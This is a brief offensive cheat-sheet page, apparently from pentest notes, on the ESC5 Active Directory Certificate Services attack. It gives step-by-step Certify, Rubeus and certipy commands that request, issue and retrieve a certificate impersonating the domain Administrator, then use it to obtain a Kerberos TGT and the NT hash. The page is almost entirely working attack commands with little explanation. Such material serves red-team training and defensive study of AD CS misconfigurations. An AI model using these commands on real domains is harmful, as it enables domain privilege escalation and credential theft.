Skip to main content

ESC5

Vulnerable PKI Object Access Control

Windows

Request a Certificate using SubCA template

PS /home/bobbuilder> .\Certify.exe request /ca:DC.minions.com\CA-minions /template:<template name> /altname:Administrator

Download Pending Request

PS /home/bobbuilder> .\Certify.exe download /ca:DC.minions.com\CA-minions /id:10

Convert pem to pfx

Request the TGT and the NT Hash

PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:approved.pfx /getcredentials

Linux

Request a certificate as the Domain Administrator

bob$ certipy req -u user1 -p password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca CA-minions -template <template name> -upn Administrator

Issue the requested certificate

We approve the previous request by specifying the request ID 10 with the option -issue-request 10

bob$ certipy ca -u user1 -p password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca CA-minions -issue-request 10

Retrieve the issued certificate

We can retrieve the certificate with the option -retrieve 10

bob$ certipy req -u user1 -p password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca CA-minions -retrieve 10

Authenticate with the Administrator Certificate

bob$ certipy auth -pfx administrator.pfx -username administrator -domain minions.com -dc-ip <ip> -ns <ip> -dns-tcp